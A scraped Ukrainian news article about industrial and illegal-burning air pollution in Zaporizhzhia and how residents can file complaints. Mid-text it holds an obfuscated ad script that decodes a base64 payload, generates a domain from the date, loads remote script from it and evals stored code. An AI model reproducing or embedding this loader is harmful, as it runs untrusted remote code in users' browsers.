До кінця воєнного стану змін не буде: за яких умов зникне сморід у Запоріжжі

Проблеми екології і забруднення повітря для жителів Запоріжжя не є новиною. Основною причиною є викиди промислових підприємств, однак нерідко отруюють повітря також і незаконні пункти переробки чи випалювання відходів.

Про способи боротьби зі смородом у місті розповіли під час брифінгу директор Департаменту захисту довкілля Сергій Карпій і екоактивіст Микола Ралик, передає Акцент.

Як зауважив Карпій, у Запоріжжі постійно фіксують перевищення допустимих показників концентрацій фенолу, сірководню і формальдегіду в повітрі. Основні забруднювачі — великі промислові підприємства (97% від усіх викидів). Однак також є і незаконні підприємства, які працюють без дозволу і забруднюють повітря.

Що стосується обмеження роботи промислових підприємств, то

Наразі законодавством надана можливість розробки спеціальної програми міськрадою про поступове зниження викидів і зменшення допустимих концентрацій забруднюючих речовин. Для цього міністерство охорони довкілля має встановити нові вимоги для підприємств. Підставою для внесення відповідних обмежень і змін до законодавства може стати міська програма. Департамент ЗОДА наразі може робити подання, надавати свої пропозиції, але її можна буде ухвалити лише після військового стану, — розповів Карпій.

Також Карпій розповів, що на початку війни спостерігалась унікальна ситуація у місті, коли не працювали великі підприємства-забруднювачі. За цей час не надходило жодних скарг на якість атмосферного повітря, не було зафіксовано перевищень. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Логічним питанням журналістів стало те, чи варто взагалі скаржитися на сморід у місті, якщо зниження викидів можливе лише після завершення військового стану. На це очільник департаменту відповів, що скарги необхідні для збору даних й створення необхідної бази для майбутньої програми.

Також свою думку висловив і Микола Ралик. Він пояснив, що часто причиною смороду є не тільки викиди від підприємств, а й незаконні випалювання кабелів і інших матеріалів. Саме для боротьби з подібними порушеннями й необхідні скарги громадян. Вони дозволяють відслідкувати місця-джерела викидів і знайти порушників. Припиненням їхньої діяльності займають правоохоронні органи й екологічні групи.

Коли городяни активно беруть участь у контролі повітря і активно скаржаться, то це призводить до того, що підпільні виробництва припиняють або зменшують свою діяльність. Разом з цим зменшується і шкідливий вплив на здоров’я людей від цих забруднень, — наголосив Ралик.

Також екоактивіст закликав запоріжців відправляти заявки не тільки у контакт-центр 15-80, а й користуватися чат-ботом у телеграмі. Цей чат-бот порівнює локацію з викидами з напрямков вітру і дозволяє більш ефективно знаходити джерела забруднення. (adsbygoogle = window.adsbygoogle || []).push({});

Названо найбільш песимістичні сценарії для водойм Запоріжжя після руйнування Каховської ГЕС (ФОТО, ВІДЕО) Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/do-kintsya-voyennogo-stanu-zmin-ne-bude-za-yakih-umov-znikne-smorid-u-zaporizhzhi/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top